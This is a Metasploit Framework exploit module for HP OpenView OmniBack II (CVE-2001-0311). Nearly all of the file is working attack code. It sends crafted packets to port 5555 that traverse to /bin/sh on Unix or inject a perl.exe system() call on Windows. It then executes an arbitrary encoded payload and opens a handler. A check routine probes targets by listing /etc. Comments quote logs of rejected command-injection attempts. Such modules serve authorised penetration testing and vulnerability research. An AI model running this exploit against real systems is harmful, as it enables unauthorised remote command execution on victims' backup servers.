##
# $Id: openview_omniback_exec.rb 10394 2010-09-20 08:06:27Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'HP OpenView OmniBack II Command Execution',
			'Description'    => %q{
					This module uses a vulnerability in the OpenView Omniback II
				service to execute arbitrary commands. This vulnerability was
				discovered by DiGiT and his code was used as the basis for this
				module.

				For Microsoft Windows targets, due to module limitations, use the
				"unix/cmd/generic" payload and set CMD to your command. You can only
				pass a small amount of characters (4) to the command line on Windows.
			},
			'Author'         => [ 'hdm', 'patrick' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 10394 $',
			'References'     =>
				[
					['CVE', '2001-0311'],
					['OSVDB', '6018'],
					['BID', '11032'],
					['URL', 'http://www.securiteam.com/exploits/6M00O150KG.html'],
				],
			'Platform'       => ['unix'], # win
			'Arch'           => ARCH_CMD,
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'       => 1024,
					'DisableNops' => true,
					'Compat'      =>
						{
							'PayloadType' => 'cmd',
							'RequiredCmd' => 'generic perl telnet',
						}
				},
			'Targets'        =>
				[
					[ 'Unix', { }],
					[ 'Windows', { }],
				],
			'DisclosureDate' => 'Feb 28 2001',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(5555)
			], self.class)
	end

	def check

		if (target.name =~ /Unix/)
			connect

			poof =
				"\x00\x00\x00.2"+
				"\x00 a"+
				"\x00 0"+
				"\x00 0"+
				"\x00 0"+
				"\x00 A"+
				"\x00 28"+
				"\x00/../../../bin/sh"+
				"\x00\x00"+
				"digit "+
				"AAAA\n\x00"

			sock.put(poof)
			sock.put("echo /etc/*;\n")
			res = sock.get_once(-1, 5)
			disconnect

			if !(res and res.length > 0)
				print_status("The remote service did not reply to our request")
				return Exploit::CheckCode::Safe
			end

			if (res =~ /passwd|group|resolv/)
				print_status("The remote service is exploitable")
				return Exploit::CheckCode::Vulnerable
			end

			return Exploit::CheckCode::Safe
		end

		if (target.name =~ /Windows/)
			connect

			poof =
				"\x00\x00\x00.2"+
				"\x00 a"+
				"\x00 0"+
				"\x00 0"+
				"\x00 0"+
				"\x00 A"+
				"\x00 28"+
				"\x00\\perl.exe"+
				"\x00\x20-e\x20system(dir)\x00\x00"+
				"digit "+
				"AAAA\n\x00"

			sock.put(poof)
			res = sock.get_once(-1, 5)
			disconnect

			print_status(res.to_s)

			if !(res and res.length > 0)
				print_status("The remote service did not reply to our request")
				return Exploit::CheckCode::Safe
			end

			if (res =~ /V.o.l.u.m.e/) #Unicode
				print_status("The remote service is exploitable")
				return Exploit::CheckCode::Vulnerable
			end

			return Exploit::CheckCode::Safe
		end
	end

	def exploit
		if (target.name =~ /Unix/)
			connect

			poof =
				"\x00\x00\x00.2"+
				"\x00 a"+
				"\x00 0"+
				"\x00 0"+
				"\x00 0"+
				"\x00 A"+
				"\x00 28"+
				"\x00/../../../bin/sh"+
				"\x00\x00"+
				"digit "+
				"AAAA\n\x00"

			sock.put(poof)
			sock.put(payload.encoded + ";\n")
			res = sock.get_once(-1, 5)

			if !(res and res.length > 0)
				print_status("The remote service did not reply to our request")
				disconnect
				return
			end

			print(res)

			handler
			disconnect
		end

		if (target.name =~ /Windows/)

			# patrickw
			#
			# Tested during pen test against Windows 2003 server.
			# Windows Service details:
			# - Data Protector Inet
			# -> [HP OpenView Storage Data Protector] - Backup client service
			# -> "C:\Program Files\OmniBack\bin\omniinet.exe"
			# -> OmniInet service for Windows NT
			# -> File version: 6.0.0.0
			#
			# This needs to be cleaned up later. Preferably using the Windows/cmd/perl payloads.
			#
			# Notes:
			# I was unable to use directory traversal, OR (||) or AND (&&) techniques to directly run cmd.exe
			# Perhaps a difference in Windows/Unix code? Logs:
			#
			#11/11/2008 12:18:37 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
			#A request 28 (..\foo.exe) came from host [attacker] which is not a cell manager of this client
			#
			#11/11/2008 12:18:37 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
			#[RxNtIntegUtil] parameter refused: ..\foo.exe
			#
			#11/11/2008 12:21:59 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
			#A request 28 (x.exe || cmd /c dir > c:) came from host [attacker] which is not a cell manager of this client
			#
			#11/11/2008 12:21:59 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
			#[RxNtIntegUtil] parameter refused: x.exe || cmd /c dir > c:
			#
			#11/11/2008 12:22:40 PM  INET.5112.1884 ["inetnt/allow_deny.c /main/dp56/dp60_fix/2":496] A.06.00 bDPWIN_00384
			#A request 28 (perl.exe && cmd /c dir >) came from [attacker] which is not a cell manager of this client
			#
			#11/11/2008 12:22:40 PM  INET.5112.1884 ["inetnt/ntinet.c /main/dp56/dp60_fix/2":5170] A.06.00 bDPWIN_00384
			#[RxNtIntegUtil] parameter refused: perl.exe && cmd /c dir >

			connect

			poof =
				"\x00\x00\x00.2"+
				"\x00 a"+
				"\x00 0"+
				"\x00 0"+
				"\x00 0"+
				"\x00 A"+
				"\x00 28"+
				"\x00\\perl.exe"+
				"\x00\x20-esystem(#{payload.encoded})\x00\x00"+
				"digit "+
				"AAAA\n\x00"

			sock.put(poof)
			#sock.put(payload.encoded + "\n")
			res = sock.get_once(-1, 5)

			if !(res and res.length > 0)
				print_status("The remote service did not reply to our request")
				disconnect
				return
			end

			print(res)

			handler
			disconnect
		end
	end
end
